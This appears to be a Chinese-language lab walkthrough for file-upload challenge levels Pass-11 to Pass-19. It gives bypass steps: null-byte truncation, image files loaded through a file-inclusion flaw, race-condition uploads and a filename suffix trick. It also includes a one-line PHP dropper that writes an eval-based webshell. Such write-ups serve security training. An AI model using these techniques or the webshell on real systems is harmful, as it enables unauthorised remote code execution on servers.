Pass-11
第一步:阅读本关考点
第二步:将文件名后缀修改为.jpg,尝试上传,并打开bp抓包
第三步:添加%00截断
第四步:成功上传
Pass-12
第一步:阅读本关考点,仍为%00阶段绕过
第二步:将文件名后缀修改为.jpg,尝试上传,并打开bp抓包
第三步:添加文件名及%00截断,并对%00进行URL解码
第四步:成功上传
Pass-13
第一步:阅读本关考点及源码
第二步:对test.php进行编辑
第三步:直接上传编辑好的test文件,配合文件包含漏洞查看效果,成功上传
#包含文件包含漏洞的界面
http://ln2mr-b0a.aqlab.cn/Pass-01/include.php
#测试网址
http://ln2mr-b0a.aqlab.cn/Pass-01/include.php?file=..//Pass-13/upload//9220250311213942.gif
Pass-14 --- 同Pass-13
Pass-15 --- 同Pass-13
Pass-16
第一步:阅读本关考点及源码
第二步:上传二次渲染专用图
第三步:右键文件部分新建标签页打开
#包含文件包含漏洞的界面
http://192.168.0.104/upload/include.php
#测试网址
http://192.168.0.104/upload/include.php?file=Pass-17/upload//3191.jpg
Pass-17
第一步:生成一个能够输出木马文件的木马文件father.php,上传并使用bp抓包
#能够输出木马文件的木马文件father.php
<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?>
第二步:发送至攻击模块,开始无限上传
第三步:抓取访问father.php的包,开始无限访问,若访问到则会生成一个shell.php文件
Pass-18
第一步:修改上一关中的father.php
第二步:修改后缀为.jpg,上传并抓包,无限上传
第三步:利用文件包含漏洞一直包含这个文件,如果包含成功,则会生成木马
#包含文件包含漏洞的界面
http://ln2mr-b0a.aqlab.cn/Pass-01/include.php
#测试网址
http://ln2mr-b0a.aqlab.cn/Pass-01/include.php?file=..//Pass-18/upload/father.gif
Pass-19
第一步:阅读本关考点
第二步:更改test.php后缀为jpg,保存名称为test.php/.进行上传
/会被当成目录路径,而.会被系统删除
第三步:上传成功